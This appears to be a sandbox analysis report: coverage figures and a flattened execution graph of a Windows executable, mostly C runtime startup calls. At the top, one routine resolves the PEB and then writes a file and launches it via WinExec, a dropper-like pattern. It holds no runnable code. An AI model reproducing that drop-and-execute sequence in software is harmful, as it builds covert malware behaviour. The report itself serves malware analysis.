                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:4%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:74
                              execution_graph 6970 414000 6972 414044 GetPEB 6970->6972 6973 414077 CreateFileA 6972->6973 6975 414265 6973->6975 6976 41422d 6973->6976 6977 414246 WriteFile 6976->6977 6978 414244 6976->6978 6979 414255 CloseHandle WinExec 6977->6979 6978->6979 6979->6975 9372 405188 9373 405194 ___lock_fhandle 9372->9373 9374 4051ac 9373->9374 9375 403abd __freea 67 API calls 9373->9375 9405 405296 ___lock_fhandle 9373->9405 9376 4051ba 9374->9376 9378 403abd __freea 67 API calls 9374->9378 9375->9374 9377 4051c8 9376->9377 9379 403abd __freea 67 API calls 9376->9379 9380 4051d6 9377->9380 9381 403abd __freea 67 API calls 9377->9381 9378->9376 9379->9377 9382 4051e4 9380->9382 9383 403abd __freea 67 API calls 9380->9383 9381->9380 9384 4051f2 9382->9384 9386 403abd __freea 67 API calls 9382->9386 9383->9382 9385 405200 9384->9385 9387 403abd __freea 67 API calls 9384->9387 9388 405211 9385->9388 9389 403abd __freea 67 API calls 9385->9389 9386->9384 9387->9385 9390 403ef9 __lock 67 API calls 9388->9390 9389->9388 9391 405219 9390->9391 9392 405225 InterlockedDecrement 9391->9392 9393 40523e 9391->9393 9392->9393 9395 405230 9392->9395 9408 4052a2 9393->9408 9395->9393 9398 403abd __freea 67 API calls 9395->9398 9397 403ef9 __lock 67 API calls 9399 405252 9397->9399 9398->9393 9400 405283 9399->9400 9401 404d5a ___removelocaleref 8 API calls 9399->9401 9411 4052ae 9400->9411 9406 405267 9401->9406 9404 403abd __freea 67 API calls 9404->9405 9406->9400 9407 404b82 ___freetlocinfo 67 API calls 9406->9407 9407->9400 9414 403e1f LeaveCriticalSection 9408->9414 9410 40524b 9410->9397 9415 403e1f LeaveCriticalSection 9411->9415 9413 405290 9413->9404 9414->9410 9415->9413 6980 402495 7019 40379c 6980->7019 6982 4024a1 GetStartupInfoA 6984 4024c4 6982->6984 7020 4064d7 HeapCreate 6984->7020 6986 402514 7022 4052b7 GetModuleHandleW 6986->7022 6990 402525 __RTC_Initialize 7056 40332b 6990->7056 6991 40246c _fast_error_exit 67 API calls 6991->6990 6993 402533 6994 40253f GetCommandLineA 6993->6994 7148 402164 6993->7148 7071 4063a0 6994->7071 7001 402564 7107 40606d 7001->7107 7003 402164 __amsg_exit 67 API calls 7003->7001 7005 402575 7122 402223 7005->7122 7006 402164 __amsg_exit 67 API calls 7006->7005 7008 40257c 7009 402587 7008->7009 7010 402164 __amsg_exit 67 API calls 7008->7010 7128 40600e 7009->7128 7010->7009 7015 4025b6 7155 402400 7015->7155 7018 4025bb ___lock_fhandle 7019->6982 7021 402508 7020->7021 7021->6986 7140 40246c 7021->7140 7023 4052d2 7022->7023 7024 4052cb 7022->7024 7026 40543a 7023->7026 7027 4052dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress 7023->7027 7158 402134 7024->7158 7217 404fd1 7026->7217 7029 405325 TlsAlloc 7027->7029 7032 40251a 7029->7032 7033 405373 TlsSetValue 7029->7033 7032->6990 7032->6991 7033->7032 7034 405384 7033->7034 7162 40241e 7034->7162 7039 404ea7 __encode_pointer 6 API calls 7040 4053a4 7039->7040 7041 404ea7 __encode_pointer 6 API calls 7040->7041 7042 4053b4 7041->7042 7043 404ea7 __encode_pointer 6 API calls 7042->7043 7044 4053c4 7043->7044 7179 403d7d 7044->7179 7051 404f22 __decode_pointer 6 API calls 7052 405418 7051->7052 7052->7026 7053 40541f 7052->7053 7199 40500e 7053->7199 7055 405427 GetCurrentThreadId 7055->7032 7549 40379c 7056->7549 7058 403337 GetStartupInfoA 7059 4039d1 __calloc_crt 67 API calls 7058->7059 7067 403358 7059->7067 7060 403576 ___lock_fhandle 7060->6993 7061 4034f3 GetStdHandle 7066 4034bd 7061->7066 7062 4039d1 __calloc_crt 67 API calls 7062->7067 7063 403558 SetHandleCount 7063->7060 7064 403505 GetFileType 7064->7066 7065 403440 7065->7060 7065->7066 7068 403469 GetFileType 7065->7068 7070 405f27 ___lock_fhandle InitializeCriticalSectionAndSpinCount 7065->7070 7066->7060 7066->7061 7066->7063 7066->7064 7069 405f27 ___lock_fhandle InitializeCriticalSectionAndSpinCount 7066->7069 7067->7060 7067->7062 7067->7065 7067->7066 7068->7065 7069->7066 7070->7065 7072 4063dd 7071->7072 7073 4063be GetEnvironmentStringsW 7071->7073 7075 4063c6 7072->7075 7076 406476 7072->7076 7074 4063d2 GetLastError 7073->7074 7073->7075 7074->7072 7077 4063f9 GetEnvironmentStringsW 7075->7077 7082 406408 WideCharToMultiByte 7075->7082 7078 40647f GetEnvironmentStrings 7076->7078 7080 40254f 7076->7080 7077->7080 7077->7082 7078->7080 7081 40648f 7078->7081 7096 4062e5 7080->7096 7081->7081 7086 40398c __malloc_crt 67 API calls 7081->7086 7083 40646b FreeEnvironmentStringsW 7082->7083 7084 40643c 7082->7084 7083->7080 7085 40398c __malloc_crt 67 API calls 7084->7085 7088 406442 7085->7088 7087 4064a9 7086->7087 7089 4064b0 FreeEnvironmentStringsA 7087->7089 7090 4064bc ___crtGetEnvironmentStringsA 7087->7090 7088->7083 7091 40644a WideCharToMultiByte 7088->7091 7089->7080 7094 4064c6 FreeEnvironmentStringsA 7090->7094 7092 406464 7091->7092 7093 40645c 7091->7093 7092->7083 7095 403abd __freea 67 API calls 7093->7095 7094->7080 7095->7092 7097 4062fa 7096->7097 7098 4062ff GetModuleFileNameA 7096->7098 7556 404b64 7097->7556 7100 406326 7098->7100 7550 40614b 7100->7550 7102 402559 7102->7001 7102->7003 7104 40398c __malloc_crt 67 API calls 7105 406368 7104->7105 7105->7102 7106 40614b _parse_cmdline 77 API calls 7105->7106 7106->7102 7108 406076 7107->7108 7111 40607b _strlen 7107->7111 7109 404b64 ___initmbctable 111 API calls 7108->7109 7109->7111 7110 40256a 7110->7005 7110->7006 7111->7110 7112 4039d1 __calloc_crt 67 API calls 7111->7112 7117 4060b0 _strlen 7112->7117 7113 40610e 7114 403abd __freea 67 API calls 7113->7114 7114->7110 7115 4039d1 __calloc_crt 67 API calls 7115->7117 7116 406134 7118 403abd __freea 67 API calls 7116->7118 7117->7110 7117->7113 7117->7115 7117->7116 7119 408f6b _strcpy_s 67 API calls 7117->7119 7120 4060f5 7117->7120 7118->7110 7119->7117 7120->7117 7121 4035c0 __invoke_watson 10 API calls 7120->7121 7121->7120 7124 402231 __IsNonwritableInCurrentImage 7122->7124 7967 4059ce 7124->7967 7125 40224f __initterm_e 7127 40226e __IsNonwritableInCurrentImage __initterm 7125->7127 7971 40596b 7125->7971 7127->7008 7129 40601c 7128->7129 7132 406021 7128->7132 7130 404b64 ___initmbctable 111 API calls 7129->7130 7130->7132 7131 40258d 7134 4017b0 7131->7134 7132->7131 7133 404364 __wincmdln 77 API calls 7132->7133 7133->7132 8071 4014e0 GetModuleFileNameA 7134->8071 7136 4017c4 7136->7015 7137 4023d4 7136->7137 7138 4022a8 _doexit 67 API calls 7137->7138 7139 4023e5 7138->7139 7139->7015 7141 40247a 7140->7141 7142 40247f 7140->7142 7143 40580b __FF_MSGBANNER 67 API calls 7141->7143 7144 405660 __NMSG_WRITE 67 API calls 7142->7144 7143->7142 7145 402487 7144->7145 7146 4021b8 __mtinitlocknum 3 API calls 7145->7146 7147 402491 7146->7147 7147->6986 7149 40580b __FF_MSGBANNER 67 API calls 7148->7149 7150 40216e 7149->7150 7151 405660 __NMSG_WRITE 67 API calls 7150->7151 7152 402176 7151->7152 7153 404f22 __decode_pointer 6 API calls 7152->7153 7154 402181 7153->7154 7154->6994 7156 4022a8 _doexit 67 API calls 7155->7156 7157 40240b 7156->7157 7157->7018 7159 40213f Sleep GetModuleHandleW 7158->7159 7160 402161 7159->7160 7161 40215d 7159->7161 7160->7023 7161->7159 7161->7160 7223 404f19 7162->7223 7164 402426 __init_pointers __initp_misc_winsig 7226 405b76 7164->7226 7167 404ea7 __encode_pointer 6 API calls 7168 402462 7167->7168 7169 404ea7 TlsGetValue 7168->7169 7170 404ee0 GetModuleHandleW 7169->7170 7171 404ebf 7169->7171 7173 404ef0 7170->7173 7174 404efb GetProcAddress 7170->7174 7171->7170 7172 404ec9 TlsGetValue 7171->7172 7176 404ed4 7172->7176 7175 402134 __crt_waiting_on_module_handle 2 API calls 7173->7175 7178 404ed8 7174->7178 7177 404ef6 7175->7177 7176->7170 7176->7178 7177->7174 7177->7178 7178->7039 7180 403d88 7179->7180 7182 403db6 7180->7182 7229 405f27 7180->7229 7182->7026 7183 404f22 TlsGetValue 7182->7183 7184 404f3a 7183->7184 7185 404f5b GetModuleHandleW 7183->7185 7184->7185 7186 404f44 TlsGetValue 7184->7186 7187 404f76 GetProcAddress 7185->7187 7188 404f6b 7185->7188 7191 404f4f 7186->7191 7190 404f53 7187->7190 7189 402134 __crt_waiting_on_module_handle 2 API calls 7188->7189 7192 404f71 7189->7192 7190->7026 7193 4039d1 7190->7193 7191->7185 7191->7190 7192->7187 7192->7190 7195 4039da 7193->7195 7196 403a17 7195->7196 7197 4039f8 Sleep 7195->7197 7234 403f2c 7195->7234 7196->7026 7196->7051 7198 403a0d 7197->7198 7198->7195 7198->7196 7528 40379c 7199->7528 7201 40501a GetModuleHandleW 7202 405030 7201->7202 7203 40502a 7201->7203 7204 405048 GetProcAddress GetProcAddress 7202->7204 7205 40506c 7202->7205 7206 402134 __crt_waiting_on_module_handle 2 API calls 7203->7206 7204->7205 7207 403ef9 __lock 63 API calls 7205->7207 7206->7202 7208 40508b InterlockedIncrement 7207->7208 7529 4050e3 7208->7529 7211 403ef9 __lock 63 API calls 7212 4050ac 7211->7212 7532 404ccb InterlockedIncrement 7212->7532 7214 4050ca 7544 4050ec 7214->7544 7216 4050d7 ___lock_fhandle 7216->7055 7218 404fe7 7217->7218 7219 404fdb 7217->7219 7220 405009 7218->7220 7221 404ffb TlsFree 7218->7221 7222 404f22 __decode_pointer 6 API calls 7219->7222 7220->7220 7221->7220 7222->7218 7224 404ea7 __encode_pointer 6 API calls 7223->7224 7225 404f20 7224->7225 7225->7164 7227 404ea7 __encode_pointer 6 API calls 7226->7227 7228 402458 7227->7228 7228->7167 7233 40379c 7229->7233 7231 405f33 InitializeCriticalSectionAndSpinCount 7232 405f77 ___lock_fhandle 7231->7232 7232->7180 7233->7231 7235 403f38 ___lock_fhandle 7234->7235 7236 403f50 7235->7236 7246 403f6f _memset 7235->7246 7247 403750 7236->7247 7240 403fe1 HeapAlloc 7240->7246 7241 403f65 ___lock_fhandle 7241->7195 7246->7240 7246->7241 7253 403ef9 7246->7253 7260 407601 7246->7260 7266 404028 7246->7266 7269 405f96 7246->7269 7272 4050f5 GetLastError 7247->7272 7249 403755 7250 4036e8 7249->7250 7251 404f22 __decode_pointer 6 API calls 7250->7251 7252 4036f8 __invoke_watson 7251->7252 7254 403f21 EnterCriticalSection 7253->7254 7255 403f0e 7253->7255 7254->7246 7320 403e36 7255->7320 7257 403f14 7257->7254 7258 402164 __amsg_exit 66 API calls 7257->7258 7259 403f20 7258->7259 7259->7254 7261 40762f 7260->7261 7262 4076c8 7261->7262 7265 4076d1 7261->7265 7516 407168 7261->7516 7262->7265 7523 407218 7262->7523 7265->7246 7527 403e1f LeaveCriticalSection 7266->7527 7268 40402f 7268->7246 7270 404f22 __decode_pointer 6 API calls 7269->7270 7271 405fa6 7270->7271 7271->7246 7287 404f9d TlsGetValue 7272->7287 7275 405162 SetLastError 7275->7249 7276 4039d1 __calloc_crt 64 API calls 7277 405120 7276->7277 7277->7275 7278 405128 7277->7278 7279 404f22 __decode_pointer 6 API calls 7278->7279 7280 40513a 7279->7280 7281 405141 7280->7281 7282 405159 7280->7282 7283 40500e __initptd 64 API calls 7281->7283 7292 403abd 7282->7292 7285 405149 GetCurrentThreadId 7283->7285 7285->7275 7286 40515f 7286->7275 7288 404fb2 7287->7288 7289 404fcd 7287->7289 7290 404f22 __decode_pointer 6 API calls 7288->7290 7289->7275 7289->7276 7291 404fbd TlsSetValue 7290->7291 7291->7289 7294 403ac9 ___lock_fhandle 7292->7294 7293 403b42 ___lock_fhandle _realloc 7293->7286 7294->7293 7295 403ef9 __lock 65 API calls 7294->7295 7304 403b08 7294->7304 7300 403ae0 ___sbh_find_block 7295->7300 7296 403b1d HeapFree 7296->7293 7297 403b2f 7296->7297 7298 403750 __read 65 API calls 7297->7298 7299 403b34 GetLastError 7298->7299 7299->7293 7301 403afa 7300->7301 7305 406e52 7300->7305 7312 403b13 7301->7312 7304->7293 7304->7296 7306 407133 7305->7306 7307 406e91 7305->7307 7306->7301 7307->7306 7308 40707d VirtualFree 7307->7308 7309 4070e1 7308->7309 7309->7306 7310 4070f0 VirtualFree HeapFree 7309->7310 7315 409d20 7310->7315 7319 403e1f LeaveCriticalSection 7312->7319 7314 403b1a 7314->7304 7316 409d38 7315->7316 7317 409d67 7316->7317 7318 409d5f __VEC_memcpy 7316->7318 7317->7306 7318->7317 7319->7314 7321 403e42 ___lock_fhandle 7320->7321 7322 403e52 7321->7322 7323 403e6a 7321->7323 7348 40580b 7322->7348 7329 403e78 ___lock_fhandle 7323->7329 7394 40398c 7323->7394 7329->7257 7331 403e99 7335 403ef9 __lock 67 API calls 7331->7335 7332 403e8a 7334 403750 __read 67 API calls 7332->7334 7334->7329 7336 403ea0 7335->7336 7338 403ed4 7336->7338 7339 403ea8 7336->7339 7341 403abd __freea 67 API calls 7338->7341 7340 405f27 ___lock_fhandle InitializeCriticalSectionAndSpinCount 7339->7340 7342 403eb3 7340->7342 7347 403ec5 7341->7347 7343 403abd __freea 67 API calls 7342->7343 7342->7347 7345 403ebf 7343->7345 7346 403750 __read 67 API calls 7345->7346 7346->7347 7400 403ef0 7347->7400 7403 409770 7348->7403 7351 40581f 7353 405660 __NMSG_WRITE 67 API calls 7351->7353 7355 403e57 7351->7355 7352 409770 __set_error_mode 67 API calls 7352->7351 7354 405837 7353->7354 7356 405660 __NMSG_WRITE 67 API calls 7354->7356 7357 405660 7355->7357 7356->7355 7358 405674 7357->7358 7359 409770 __set_error_mode 64 API calls 7358->7359 7390 403e5e 7358->7390 7360 405696 7359->7360 7361 4057d4 GetStdHandle 7360->7361 7362 409770 __set_error_mode 64 API calls 7360->7362 7363 4057e2 _strlen 7361->7363 7361->7390 7364 4056a7 7362->7364 7366 4057fb WriteFile 7363->7366 7363->7390 7364->7361 7365 4056b9 7364->7365 7365->7390 7409 408f6b 7365->7409 7366->7390 7369 4056ef GetModuleFileNameA 7371 40570d 7369->7371 7377 405730 _strlen 7369->7377 7373 408f6b _strcpy_s 64 API calls 7371->7373 7374 40571d 7373->7374 7376 4035c0 __invoke_watson 10 API calls 7374->7376 7374->7377 7375 405773 7434 408df6 7375->7434 7376->7377 7377->7375 7425 408eb6 7377->7425 7381 405797 7384 408df6 _strcat_s 64 API calls 7381->7384 7383 4035c0 __invoke_watson 10 API calls 7383->7381 7385 4057ab 7384->7385 7387 4057bc 7385->7387 7388 4035c0 __invoke_watson 10 API calls 7385->7388 7386 4035c0 __invoke_watson 10 API calls 7386->7375 7443 409607 7387->7443 7388->7387 7391 4021b8 7390->7391 7481 40218d GetModuleHandleW 7391->7481 7396 403995 7394->7396 7397 4039cb 7396->7397 7398 4039ac Sleep 7396->7398 7485 406ac2 7396->7485 7397->7331 7397->7332 7399 4039c1 7398->7399 7399->7396 7399->7397 7515 403e1f LeaveCriticalSection 7400->7515 7402 403ef7 7402->7329 7404 40977f 7403->7404 7405 403750 __read 67 API calls 7404->7405 7406 405812 7404->7406 7407 4097a2 7405->7407 7406->7351 7406->7352 7408 4036e8 __read 6 API calls 7407->7408 7408->7406 7410 408f7c 7409->7410 7413 408f83 7409->7413 7410->7413 7416 408fa9 7410->7416 7411 403750 __read 67 API calls 7412 408f88 7411->7412 7414 4036e8 __read 6 API calls 7412->7414 7413->7411 7415 4056db 7414->7415 7415->7369 7418 4035c0 7415->7418 7416->7415 7417 403750 __read 67 API calls 7416->7417 7417->7412 7470 401ae0 7418->7470 7420 4035ed IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7421 4036c9 GetCurrentProcess TerminateProcess 7420->7421 7422 4036bd __invoke_watson 7420->7422 7472 401ee2 7421->7472 7422->7421 7424 4036e6 7424->7369 7430 408ec8 7425->7430 7426 408ecc 7427 405760 7426->7427 7428 403750 __read 67 API calls 7426->7428 7427->7375 7427->7386 7429 408ee8 7428->7429 7431 4036e8 __read 6 API calls 7429->7431 7430->7426 7430->7427 7432 408f12 7430->7432 7431->7427 7432->7427 7433 403750 __read 67 API calls 7432->7433 7433->7429 7437 408e0e 7434->7437 7438 408e07 7434->7438 7435 403750 __read 67 API calls 7436 408e13 7435->7436 7439 4036e8 __read 6 API calls 7436->7439 7437->7435 7438->7437 7440 408e42 7438->7440 7441 405786 7439->7441 7440->7441 7442 403750 __read 67 API calls 7440->7442 7441->7381 7441->7383 7442->7436 7444 404f19 ___crtMessageBoxW 6 API calls 7443->7444 7445 409617 7444->7445 7446 4096b2 7445->7446 7447 40962a LoadLibraryA 7445->7447 7454 404f22 __decode_pointer 6 API calls 7446->7454 7466 4096dc 7446->7466 7448 409754 7447->7448 7449 40963f GetProcAddress 7447->7449 7448->7390 7449->7448 7451 409655 7449->7451 7450 409707 7452 404f22 __decode_pointer 6 API calls 7450->7452 7455 404ea7 __encode_pointer 6 API calls 7451->7455 7452->7448 7453 404f22 __decode_pointer 6 API calls 7464 40971f 7453->7464 7456 4096cf 7454->7456 7457 40965b GetProcAddress 7455->7457 7458 404f22 __decode_pointer 6 API calls 7456->7458 7459 404ea7 __encode_pointer 6 API calls 7457->7459 7458->7466 7460 409670 GetProcAddress 7459->7460 7461 404ea7 __encode_pointer 6 API calls 7460->7461 7462 409685 GetProcAddress 7461->7462 7463 404ea7 __encode_pointer 6 API calls 7462->7463 7467 40969a 7463->7467 7464->7450 7465 404f22 __decode_pointer 6 API calls 7464->7465 7465->7450 7466->7450 7466->7453 7467->7446 7468 4096a4 GetProcAddress 7467->7468 7469 404ea7 __encode_pointer 6 API calls 7468->7469 7469->7446 7471 401aec __VEC_memzero 7470->7471 7471->7420 7473 401eea 7472->7473 7474 401eec IsDebuggerPresent 7472->7474 7473->7424 7480 406915 7474->7480 7477 404466 SetUnhandledExceptionFilter UnhandledExceptionFilter 7478 40448b GetCurrentProcess TerminateProcess 7477->7478 7479 404483 __invoke_watson 7477->7479 7478->7424 7479->7478 7480->7477 7482 4021a1 GetProcAddress 7481->7482 7483 4021b6 ExitProcess 7481->7483 7482->7483 7484 4021b1 7482->7484 7484->7483 7486 406b75 7485->7486 7495 406ad4 7485->7495 7487 405f96 __calloc_impl 6 API calls 7486->7487 7488 406b7b 7487->7488 7490 403750 __read 66 API calls 7488->7490 7489 40580b __FF_MSGBANNER 66 API calls 7494 406ae5 7489->7494 7502 406b6d 7490->7502 7492 405660 __NMSG_WRITE 66 API calls 7492->7494 7493 406b31 HeapAlloc 7493->7495 7494->7489 7494->7492 7494->7493 7494->7495 7496 4021b8 __mtinitlocknum 3 API calls 7494->7496 7495->7494 7497 406b61 7495->7497 7499 405f96 __calloc_impl 6 API calls 7495->7499 7500 406b66 7495->7500 7495->7502 7503 406a73 7495->7503 7496->7494 7498 403750 __read 66 API calls 7497->7498 7498->7500 7499->7495 7501 403750 __read 66 API calls 7500->7501 7501->7502 7502->7396 7504 406a7f ___lock_fhandle 7503->7504 7505 406ab0 ___lock_fhandle 7504->7505 7506 403ef9 __lock 67 API calls 7504->7506 7505->7495 7507 406a95 7506->7507 7508 407601 ___sbh_alloc_block 5 API calls 7507->7508 7509 406aa0 7508->7509 7511 406ab9 7509->7511 7514 403e1f LeaveCriticalSection 7511->7514 7513 406ac0 7513->7505 7514->7513 7515->7402 7517 40717b HeapReAlloc 7516->7517 7518 4071af HeapAlloc 7516->7518 7519 40719d 7517->7519 7522 407199 7517->7522 7520 4071d2 VirtualAlloc 7518->7520 7518->7522 7519->7518 7521 4071ec HeapFree 7520->7521 7520->7522 7521->7522 7522->7262 7524 40722f VirtualAlloc 7523->7524 7526 407276 7524->7526 7526->7265 7527->7268 7528->7201 7547 403e1f LeaveCriticalSection 7529->7547 7531 4050a5 7531->7211 7533 404ce9 InterlockedIncrement 7532->7533 7534 404cec 7532->7534 7533->7534 7535 404cf6 InterlockedIncrement 7534->7535 7536 404cf9 7534->7536 7535->7536 7537 404d03 InterlockedIncrement 7536->7537 7538 404d06 7536->7538 7537->7538 7539 404d10 InterlockedIncrement 7538->7539 7540 404d13 7538->7540 7539->7540 7541 404d2c InterlockedIncrement 7540->7541 7542 404d3c InterlockedIncrement 7540->7542 7543 404d47 InterlockedIncrement 7540->7543 7541->7540 7542->7540 7543->7214 7548 403e1f LeaveCriticalSection 7544->7548 7546 4050f3 7546->7216 7547->7531 7548->7546 7549->7058 7551 40616a 7550->7551 7554 4061d7 7551->7554 7560 404364 7551->7560 7553 4062d5 7553->7102 7553->7104 7554->7553 7555 404364 77 API calls __wincmdln 7554->7555 7555->7554 7557 404b6d 7556->7557 7558 404b74 7556->7558 7782 4049ca 7557->7782 7558->7098 7563 4042f8 7560->7563 7566 401ef1 7563->7566 7565 40430b 7565->7551 7567 401f04 7566->7567 7571 401f51 7566->7571 7574 40516e 7567->7574 7571->7565 7572 401f31 7572->7571 7594 4046c5 7572->7594 7575 4050f5 __getptd_noexit 67 API calls 7574->7575 7576 405176 7575->7576 7577 401f09 7576->7577 7578 402164 __amsg_exit 67 API calls 7576->7578 7577->7572 7579 404e31 7577->7579 7578->7577 7580 404e3d ___lock_fhandle 7579->7580 7581 40516e __getptd 67 API calls 7580->7581 7582 404e42 7581->7582 7583 404e70 7582->7583 7584 404e54 7582->7584 7585 403ef9 __lock 67 API calls 7583->7585 7586 40516e __getptd 67 API calls 7584->7586 7587 404e77 7585->7587 7588 404e59 7586->7588 7610 404df3 7587->7610 7591 404e67 ___lock_fhandle 7588->7591 7593 402164 __amsg_exit 67 API calls 7588->7593 7591->7572 7593->7591 7595 4046d1 ___lock_fhandle 7594->7595 7596 40516e __getptd 67 API calls 7595->7596 7597 4046d6 7596->7597 7598 403ef9 __lock 67 API calls 7597->7598 7607 4046e8 7597->7607 7599 404706 7598->7599 7600 40474f 7599->7600 7604 404737 InterlockedIncrement 7599->7604 7605 40471d InterlockedDecrement 7599->7605 7778 404760 7600->7778 7601 402164 __amsg_exit 67 API calls 7603 4046f6 ___lock_fhandle 7601->7603 7603->7571 7604->7600 7605->7604 7606 404728 7605->7606 7606->7604 7608 403abd __freea 67 API calls 7606->7608 7607->7601 7607->7603 7609 404736 7608->7609 7609->7604 7611 404df7 7610->7611 7612 404e29 7610->7612 7611->7612 7613 404ccb ___addlocaleref 8 API calls 7611->7613 7618 404e9b 7612->7618 7614 404e0a 7613->7614 7614->7612 7621 404d5a 7614->7621 7777 403e1f LeaveCriticalSection 7618->7777 7620 404ea2 7620->7588 7622 404d6b InterlockedDecrement 7621->7622 7623 404dee 7621->7623 7624 404d80 InterlockedDecrement 7622->7624 7625 404d83 7622->7625 7623->7612 7635 404b82 7623->7635 7624->7625 7626 404d90 7625->7626 7627 404d8d InterlockedDecrement 7625->7627 7628 404d9a InterlockedDecrement 7626->7628 7629 404d9d 7626->7629 7627->7626 7628->7629 7630 404da7 InterlockedDecrement 7629->7630 7632 404daa 7629->7632 7630->7632 7631 404dc3 InterlockedDecrement 7631->7632 7632->7631 7633 404dde InterlockedDecrement 7632->7633 7634 404dd3 InterlockedDecrement 7632->7634 7633->7623 7634->7632 7636 404c06 7635->7636 7637 404b99 7635->7637 7638 404c53 7636->7638 7639 403abd __freea 67 API calls 7636->7639 7637->7636 7646 403abd __freea 67 API calls 7637->7646 7648 404bcd 7637->7648 7649 404c7a 7638->7649 7689 408b8e 7638->7689 7641 404c27 7639->7641 7643 403abd __freea 67 API calls 7641->7643 7650 404c3a 7643->7650 7644 403abd __freea 67 API calls 7651 404bfb 7644->7651 7645 404cbf 7652 403abd __freea 67 API calls 7645->7652 7653 404bc2 7646->7653 7647 403abd __freea 67 API calls 7647->7649 7654 403abd __freea 67 API calls 7648->7654 7664 404bee 7648->7664 7649->7645 7655 403abd 67 API calls __freea 7649->7655 7656 403abd __freea 67 API calls 7650->7656 7657 403abd __freea 67 API calls 7651->7657 7658 404cc5 7652->7658 7665 408d68 7653->7665 7660 404be3 7654->7660 7655->7649 7661 404c48 7656->7661 7657->7636 7658->7612 7681 408d23 7660->7681 7663 403abd __freea 67 API calls 7661->7663 7663->7638 7664->7644 7666 408df2 7665->7666 7667 408d75 7665->7667 7666->7648 7668 408d86 7667->7668 7669 403abd __freea 67 API calls 7667->7669 7670 408d98 7668->7670 7671 403abd __freea 67 API calls 7668->7671 7669->7668 7672 408daa 7670->7672 7673 403abd __freea 67 API calls 7670->7673 7671->7670 7674 408dbc 7672->7674 7675 403abd __freea 67 API calls 7672->7675 7673->7672 7676 408dce 7674->7676 7677 403abd __freea 67 API calls 7674->7677 7675->7674 7678 408de0 7676->7678 7679 403abd __freea 67 API calls 7676->7679 7677->7676 7678->7666 7680 403abd __freea 67 API calls 7678->7680 7679->7678 7680->7666 7682 408d30 7681->7682 7683 408d64 7681->7683 7684 408d40 7682->7684 7685 403abd __freea 67 API calls 7682->7685 7683->7664 7686 408d52 7684->7686 7687 403abd __freea 67 API calls 7684->7687 7685->7684 7686->7683 7688 403abd __freea 67 API calls 7686->7688 7687->7686 7688->7683 7690 404c73 7689->7690 7691 408b9f 7689->7691 7690->7647 7692 403abd __freea 67 API calls 7691->7692 7693 408ba7 7692->7693 7694 403abd __freea 67 API calls 7693->7694 7695 408baf 7694->7695 7696 403abd __freea 67 API calls 7695->7696 7697 408bb7 7696->7697 7698 403abd __freea 67 API calls 7697->7698 7699 408bbf 7698->7699 7700 403abd __freea 67 API calls 7699->7700 7701 408bc7 7700->7701 7702 403abd __freea 67 API calls 7701->7702 7703 408bcf 7702->7703 7704 403abd __freea 67 API calls 7703->7704 7705 408bd6 7704->7705 7706 403abd __freea 67 API calls 7705->7706 7707 408bde 7706->7707 7708 403abd __freea 67 API calls 7707->7708 7709 408be6 7708->7709 7710 403abd __freea 67 API calls 7709->7710 7711 408bee 7710->7711 7712 403abd __freea 67 API calls 7711->7712 7713 408bf6 7712->7713 7714 403abd __freea 67 API calls 7713->7714 7715 408bfe 7714->7715 7716 403abd __freea 67 API calls 7715->7716 7717 408c06 7716->7717 7718 403abd __freea 67 API calls 7717->7718 7719 408c0e 7718->7719 7720 403abd __freea 67 API calls 7719->7720 7721 408c16 7720->7721 7722 403abd __freea 67 API calls 7721->7722 7723 408c1e 7722->7723 7724 403abd __freea 67 API calls 7723->7724 7725 408c29 7724->7725 7726 403abd __freea 67 API calls 7725->7726 7727 408c31 7726->7727 7728 403abd __freea 67 API calls 7727->7728 7729 408c39 7728->7729 7730 403abd __freea 67 API calls 7729->7730 7731 408c41 7730->7731 7732 403abd __freea 67 API calls 7731->7732 7733 408c49 7732->7733 7734 403abd __freea 67 API calls 7733->7734 7735 408c51 7734->7735 7736 403abd __freea 67 API calls 7735->7736 7737 408c59 7736->7737 7738 403abd __freea 67 API calls 7737->7738 7739 408c61 7738->7739 7740 403abd __freea 67 API calls 7739->7740 7741 408c69 7740->7741 7742 403abd __freea 67 API calls 7741->7742 7743 408c71 7742->7743 7744 403abd __freea 67 API calls 7743->7744 7745 408c79 7744->7745 7746 403abd __freea 67 API calls 7745->7746 7747 408c81 7746->7747 7748 403abd __freea 67 API calls 7747->7748 7749 408c89 7748->7749 7750 403abd __freea 67 API calls 7749->7750 7751 408c91 7750->7751 7752 403abd __freea 67 API calls 7751->7752 7753 408c99 7752->7753 7754 403abd __freea 67 API calls 7753->7754 7755 408ca1 7754->7755 7756 403abd __freea 67 API calls 7755->7756 7757 408caf 7756->7757 7758 403abd __freea 67 API calls 7757->7758 7759 408cba 7758->7759 7760 403abd __freea 67 API calls 7759->7760 7761 408cc5 7760->7761 7762 403abd __freea 67 API calls 7761->7762 7763 408cd0 7762->7763 7764 403abd __freea 67 API calls 7763->7764 7765 408cdb 7764->7765 7766 403abd __freea 67 API calls 7765->7766 7767 408ce6 7766->7767 7768 403abd __freea 67 API calls 7767->7768 7769 408cf1 7768->7769 7770 403abd __freea 67 API calls 7769->7770 7771 408cfc 7770->7771 7772 403abd __freea 67 API calls 7771->7772 7773 408d07 7772->7773 7774 403abd __freea 67 API calls 7773->7774 7775 408d12 7774->7775 7776 403abd __freea 67 API calls 7775->7776 7776->7690 7777->7620 7781 403e1f LeaveCriticalSection 7778->7781 7780 404767 7780->7607 7781->7780 7783 4049d6 ___lock_fhandle 7782->7783 7784 40516e __getptd 67 API calls 7783->7784 7785 4049df 7784->7785 7786 4046c5 __setmbcp 69 API calls 7785->7786 7787 4049e9 7786->7787 7813 404769 7787->7813 7790 40398c __malloc_crt 67 API calls 7791 404a0a 7790->7791 7792 404b29 ___lock_fhandle 7791->7792 7820 4047e5 7791->7820 7792->7558 7795 404b36 7795->7792 7800 404b49 7795->7800 7801 403abd __freea 67 API calls 7795->7801 7796 404a3a InterlockedDecrement 7797 404a4a 7796->7797 7798 404a5b InterlockedIncrement 7796->7798 7797->7798 7803 403abd __freea 67 API calls 7797->7803 7798->7792 7799 404a71 7798->7799 7799->7792 7804 403ef9 __lock 67 API calls 7799->7804 7802 403750 __read 67 API calls 7800->7802 7801->7800 7802->7792 7805 404a5a 7803->7805 7806 404a85 InterlockedDecrement 7804->7806 7805->7798 7808 404b01 7806->7808 7809 404b14 InterlockedIncrement 7806->7809 7808->7809 7811 403abd __freea 67 API calls 7808->7811 7830 404b2b 7809->7830 7812 404b13 7811->7812 7812->7809 